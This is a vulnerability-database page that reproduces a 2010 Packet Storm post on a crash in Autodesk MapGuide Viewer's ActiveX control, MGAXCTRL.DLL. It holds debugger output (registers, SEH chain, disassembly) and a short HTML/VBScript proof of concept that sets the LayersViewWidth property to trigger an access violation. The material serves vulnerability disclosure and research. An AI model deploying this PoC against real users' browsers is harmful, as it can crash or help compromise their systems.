Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Autodesk MapGuide Viewer Overflow

🗓️ 01 Sep 2010 00:00:00Reported by d3b4gType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability, Access Violation Exception Cod

Code
`# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability  
# Date: [01-09-2010]  
# Author: [d3b4g]  
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821  
# Version: [6.5]  
# Tested on: [Winxp SP3]  
# regards to ROL guys  
  
  
  
  
  
Exception Code: ACCESS_VIOLATION  
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)  
  
Seh Chain:  
--------------------------------------------------  
1 192847C MGAXCTRL.DLL  
2 73352542 VBSCRIPT.dll  
3 7C839AD8 KERNEL32.dll  
  
  
  
Registers:  
--------------------------------------------------  
EIP 0175CE9E  
EAX 00000001  
EBX 003EB690 -> 0193F684  
ECX 00000000  
EDX 003E0608 -> 00180F98  
EDI 003EB5D8 -> 0193FC24  
ESI 00000404  
EBP 0013EA84 -> 0013EAA0  
ESP 0013EA58 -> 003EB644  
  
  
  
ArgDump:  
--------------------------------------------------  
EBP+8 003EB644 -> 0193F90C  
EBP+12 00000000  
EBP+16 0013EAD4 -> 00130000  
EBP+20 0042C4F4 -> 00110024  
EBP+24 0013EA94 -> 0013EAD4  
EBP+28 0013EB30 -> 0013EBC0  
  
  
Block Disassembly:  
--------------------------------------------------  
175CE8F POP ESI  
175CE90 JMP [EAX+60]  
175CE93 PUSH ESI  
175CE94 LEA ESI,[ECX+404]  
175CE9A TEST ESI,ESI  
175CE9C JE SHORT 0175CEC2  
175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH  
175CEA2 JE SHORT 0175CEC2  
175CEA4 PUSH 0  
175CEA6 PUSH DWORD PTR [ESP+C]  
175CEAA MOV ECX,ESI  
175CEAC PUSH 0  
175CEAE CALL 01912C63  
175CEB3 MOV EAX,[ESI]  
175CEB5 MOV ECX,ESI  
  
  
  
  
  
PoC:  
  
  
<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />  
<script language='vbscript'>  
  
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com  
  
'Wscript.echo typename(target)  
  
'for debugging/custom prolog  
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"  
prototype = "Property Let LayersViewWidth As Long"  
memberName = "LayersViewWidth"  
progid = "MGMapControl.MGMap"  
argCount = 1  
  
arg1=0  
  
target.LayersViewWidth = arg1  
  
</script>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Sep 2010 00:00Current
0.7Low risk
Vulners AI Score0.7
autodeskmapguide vieweroverflowvulnerabilityactivexmgaxctrl.dllaccess violationexception codewinxp sp3
36